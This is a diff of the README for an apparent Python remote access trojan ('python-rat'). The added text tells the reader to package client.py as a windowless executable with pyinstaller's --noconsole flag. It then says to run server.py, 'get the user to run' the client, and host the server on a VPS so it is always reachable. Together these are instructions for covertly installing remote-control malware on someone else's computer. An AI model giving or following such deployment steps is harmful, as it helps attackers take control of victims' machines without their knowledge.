wokonly/python-rat/README.txt

 # How to build

-Open command promt and enter in these commands ()
+Open command promt and enter in these commands

+cmd> cd C:\Users\Wok\example\Test

+pip install pyinstaller
+or
+py -m pip install pyinstaller

+pyinstaller --onefile --noconsole client.py

+Goto dist in the file location and client.exe will be there

+# What to do

+Run server.py and then get the user to run the client.exe / client.py

+If you cant keep your pc on 24/7 and dont have stable wifi I would get a vps server to host the server.py

+# Issues / Feedback /